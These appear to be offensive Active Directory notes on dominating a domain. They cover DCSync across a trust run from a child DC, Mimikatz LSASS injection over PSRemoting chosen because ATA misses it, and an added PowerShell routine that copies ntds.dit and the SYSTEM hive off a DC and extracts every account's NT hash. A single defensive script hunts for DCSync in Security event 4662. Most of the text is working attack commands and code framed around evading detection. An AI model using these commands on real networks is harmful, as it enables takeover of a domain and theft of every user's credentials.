Domain Dominance

DCSync Across Trusts

DCSync from a user workstation is almost certain to be flagged: ATA (and its successor, Defender for Identity) raises "Malicious replication of directory services" whenever a replication request comes from a machine that is not a domain controller. Sourced from a DC, the same request blends in, because DCs replicate with each other all the time. That is what makes DCSync across trusts viable: run it from a DC in the domain you already control (here the child DC, reached over PSRemoting with -ComputerName) against the trusting domain. The account you run it under still needs replication rights in the target domain; only the source host changes.

PS C:\Users\childuser\Desktop> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:domain.com /user:domain\krbtgt"' -ComputerName child-dc 
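The other side of the same observation: on the target DC the request still lands in Security event 4662 with the replication control-access-right GUIDs in its Properties field, and 4662 records the requesting account, not the source host. So a log-based hunt like the one below (an added example, not from the original page) keys on the subject account and still notices a DCSync launched from a DC under a user account, which is exactly the case ATA's network-sourced view misses. The sample events at the bottom are constructed, and the list of DC computer accounts is an assumption you fill in for your own domain.

```powershell
# Added example (not from the original page): hunt for DCSync-style replication
# requests in Security event 4662. The GUIDs are the extended rights DCSync needs.
$ReplicationGuids = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Test-ReplicationRequest {
    # $Event needs SubjectUserName and Properties (the raw 4662 Properties string).
    # Returns $null for events that are not replication requests at all.
    param(
        [Parameter(Mandatory)] $Event,
        [string[]] $DomainControllerAccounts   # assumption: your DC computer accounts, e.g. 'DC01$'
    )

    $matched = $ReplicationGuids.Keys |
        Where-Object { $Event.Properties -match $_ } |
        ForEach-Object { $ReplicationGuids[$_] }
    if (-not $matched) { return $null }

    # Normal replication is performed by DC computer accounts (they end in '$').
    # Anything else asking for Get-Changes-All is the DCSync pattern.
    $isDc = $Event.SubjectUserName.EndsWith('$') -and
            ($DomainControllerAccounts -contains $Event.SubjectUserName)

    [pscustomobject]@{
        Subject    = $Event.SubjectUserName
        Rights     = ($matched -join ',')
        Suspicious = (-not $isDc) -and ($matched -contains 'DS-Replication-Get-Changes-All')
    }
}

function Get-ReplicationRequest {
    # Pull 4662 from a live DC's Security log and run the check over each event.
    param(
        [string] $ComputerName = 'localhost',
        [string[]] $DomainControllerAccounts,
        [int] $MaxEvents = 5000
    )
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{ LogName = 'Security'; Id = 4662 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            Test-ReplicationRequest -Event ([pscustomobject]$data) -DomainControllerAccounts $DomainControllerAccounts
        } | Where-Object { $_ }
}

# Constructed sample events (not real log data) so the check runs offline:
$sample = @(
    [pscustomobject]@{ SubjectUserName = 'DC01$';     Properties = '{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}' }
    [pscustomobject]@{ SubjectUserName = 'childuser'; Properties = '{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}' }
    [pscustomobject]@{ SubjectUserName = 'childuser'; Properties = '{bf967a86-0de6-11d0-a285-00aa003049e2}' }  # unrelated object read
)
$sample |
    ForEach-Object { Test-ReplicationRequest -Event $_ -DomainControllerAccounts @('DC01$', 'CHILD-DC$') } |
    Format-Table -AutoSize
```

Only the second sample comes back Suspicious: the first is a known DC account doing normal replication and the third is not a replication request. On a real DC, run Get-ReplicationRequest with your own DC list; 4662 for replication is only written when auditing of directory service access is enabled on the DC.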

PSRemoting

Mixing PSRemoting with other attacks is not detected by ATA: it watches DC-bound network traffic such as Kerberos, NTLM and replication, not what runs inside a WinRM/PSRemoting session. For example, over PSRemoting we can inject Mimikatz into LSASS on a DC and grab the credentials from memory:

Invoke-Mimikatz -Command '"privilege::debug" "lsadump::lsa /inject"' -ComputerName dc

Another option is Invoke-NinjaCopy, which uses PSRemoting together with raw disk access (it parses the NTFS volume itself) to copy a file that the live system keeps locked. Note that the SYSTEM hive alone gives you nothing: it only holds the boot key needed to decrypt the hashes in ntds.dit, which you copy the same way. Copying the hive:

Invoke-NinjaCopy -Path "c:\Windows\System32\config\SYSTEM" -ComputerName "dc" -LocalDestination "c:\temp\system"
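The complete version of that step, as an added example (not from the original page or the PowerSploit project): pull both locked files off the DC with Invoke-NinjaCopy and then extract the NT hashes offline. The offline step uses the DSInternals module, which the page does not mention; the C:\temp\ntds working directory and the ntds.dit default path are assumptions. Invoke-NinjaCopy must already be loaded and you need local admin on the DC.

```powershell
# Added example (not from the original page). Assumes PowerSploit's Invoke-NinjaCopy is
# loaded, you are admin on the DC, and DSInternals is installed on the local box.
function Copy-DomainDatabase {
    param(
        [Parameter(Mandatory)] [string] $DomainController,
        [string] $LocalDir = 'C:\temp\ntds',                 # assumption: local working directory
        [string] $NtdsPath = 'C:\Windows\NTDS\ntds.dit'      # default location; confirm under
                                                             # HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters if moved
    )
    New-Item -ItemType Directory -Path $LocalDir -Force | Out-Null

    # Both files are exclusively locked on a live DC; NinjaCopy reads them straight off the volume.
    Invoke-NinjaCopy -Path $NtdsPath -ComputerName $DomainController `
                     -LocalDestination (Join-Path $LocalDir 'ntds.dit')
    Invoke-NinjaCopy -Path 'C:\Windows\System32\config\SYSTEM' -ComputerName $DomainController `
                     -LocalDestination (Join-Path $LocalDir 'SYSTEM')

    Get-ChildItem -Path $LocalDir
}

function Get-OfflineNtHashes {
    param([string] $LocalDir = 'C:\temp\ntds')
    Import-Module DSInternals -ErrorAction Stop

    # The boot key from SYSTEM unlocks the password encryption key stored inside ntds.dit.
    $bootKey = Get-BootKey -SystemHiveFilePath (Join-Path $LocalDir 'SYSTEM')

    Get-ADDBAccount -All -DBPath (Join-Path $LocalDir 'ntds.dit') -BootKey $bootKey |
        Where-Object { $_.NTHash } |          # skip accounts with no NT hash set
        ForEach-Object {
            [pscustomobject]@{
                Account = $_.SamAccountName
                NTHash  = [BitConverter]::ToString($_.NTHash).Replace('-', '')
            }
        }
}

# Usage:
# Copy-DomainDatabase -DomainController dc
# Get-OfflineNtHashes | Where-Object Account -eq 'krbtgt'
```

A copy taken from a live DC is often in a "dirty shutdown" state because the ESE database was mid-write; if Get-ADDBAccount refuses the file for that reason, run esentutl /p against the copied ntds.dit first and retry.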
